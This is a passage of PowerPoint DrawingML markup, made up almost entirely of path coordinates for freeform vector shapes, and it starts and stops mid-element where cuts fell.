                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1324" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1327" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1335" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1367" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1385" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1389" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1401" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1404" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1405" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1401" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1395" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1389" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1382" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1382" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1383" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1385" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1390" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1398" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1409" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1419" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1440" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1447" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1451" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1460" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1473" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1472" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1468" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1461" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1453" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1445" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1428" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1424" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1422" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1420" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1420" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1422" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1423" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1426" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1433" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1443" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1464" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1474" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1481" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1489" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1491" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1472" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1466" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1462" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1461" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1470" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1477" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1487" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1496" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1507" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1522" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1524" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1515" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1508" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1488" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1484" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1483" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1484" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1486" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1491" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1514" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1521" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1525" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1527" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1519" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1510" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1502" y="338"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1496" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1492" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1485" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1476" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="354"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1445" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1431" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1428" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1430" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1436" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1448" y="374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1461" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1474" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1487" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1498" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1508" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1506" y="390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1501" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1494" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1486" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1477" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1470" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1465" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1463" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1466" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1473" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1479" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1481" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1480" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1477" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1471" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1464" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1446" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1433" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1418" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1404" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1392" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1381" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1375" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1369" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1340" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1321" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1304" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1287" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1274" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1266" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1257" y="377"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1240" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1192" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1168" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1147" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1131" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1124" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1101" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1078" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1054" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1029" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1007" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="991" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="984" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="979" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="968" y="466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="952" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="933" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="915" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="899" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="887" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="881" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="874" y="523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="866" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="858" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="850" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="843" y="533"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="833" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="827" y="540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="813" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="805" y="553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="797" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="789" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="784" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="780" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="777" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="771" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="754" y="585"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="744" y="591"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="721" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="713" y="612"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="686" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="637"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="638"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="595" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="633"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="454" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="566"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="548"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="537"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="445"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="235"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="287"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="324"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="327"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="527" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="659" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="2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3092" name="Freeform 96"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="489" y="2493"/>
                <a:ext cx="34" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 105"/>
                  <a:gd name="T1" fmla="*/ 0 h 61"/>
                  <a:gd name="T2" fmla="*/ 0 w 105"/>
                  <a:gd name="T3" fmla="*/ 0 h 61"/>
                  <a:gd name="T4" fmla="*/ 0 w 105"/>
                  <a:gd name="T5" fmla="*/ 0 h 61"/>
                  <a:gd name="T6" fmla="*/ 0 w 105"/>
                  <a:gd name="T7" fmla="*/ 0 h 61"/>
                  <a:gd name="T8" fmla="*/ 0 w 105"/>
                  <a:gd name="T9" fmla="*/ 0 h 61"/>
                  <a:gd name="T10" fmla="*/ 0 w 105"/>
                  <a:gd name="T11" fmla="*/ 0 h 61"/>
                  <a:gd name="T12" fmla="*/ 0 w 105"/>
                  <a:gd name="T13" fmla="*/ 0 h 61"/>
                  <a:gd name="T14" fmla="*/ 0 w 105"/>
                  <a:gd name="T15" fmla="*/ 0 h 61"/>
                  <a:gd name="T16" fmla="*/ 0 w 105"/>
                  <a:gd name="T17" fmla="*/ 0 h 61"/>
                  <a:gd name="T18" fmla="*/ 0 w 105"/>
                  <a:gd name="T19" fmla="*/ 0 h 61"/>
                  <a:gd name="T20" fmla="*/ 0 w 105"/>
                  <a:gd name="T21" fmla="*/ 0 h 61"/>
                  <a:gd name="T22" fmla="*/ 0 w 105"/>
                  <a:gd name="T23" fmla="*/ 0 h 61"/>
                  <a:gd name="T24" fmla="*/ 0 w 105"/>
                  <a:gd name="T25" fmla="*/ 0 h 61"/>
                  <a:gd name="T26" fmla="*/ 0 w 105"/>
                  <a:gd name="T27" fmla="*/ 0 h 61"/>
                  <a:gd name="T28" fmla="*/ 0 w 105"/>
                  <a:gd name="T29" fmla="*/ 0 h 61"/>
                  <a:gd name="T30" fmla="*/ 0 w 105"/>
                  <a:gd name="T31" fmla="*/ 0 h 61"/>
                  <a:gd name="T32" fmla="*/ 0 w 105"/>
                  <a:gd name="T33" fmla="*/ 0 h 61"/>
                  <a:gd name="T34" fmla="*/ 0 w 105"/>
                  <a:gd name="T35" fmla="*/ 0 h 61"/>
                  <a:gd name="T36" fmla="*/ 0 w 105"/>
                  <a:gd name="T37" fmla="*/ 0 h 61"/>
                  <a:gd name="T38" fmla="*/ 0 w 105"/>
                  <a:gd name="T39" fmla="*/ 0 h 61"/>
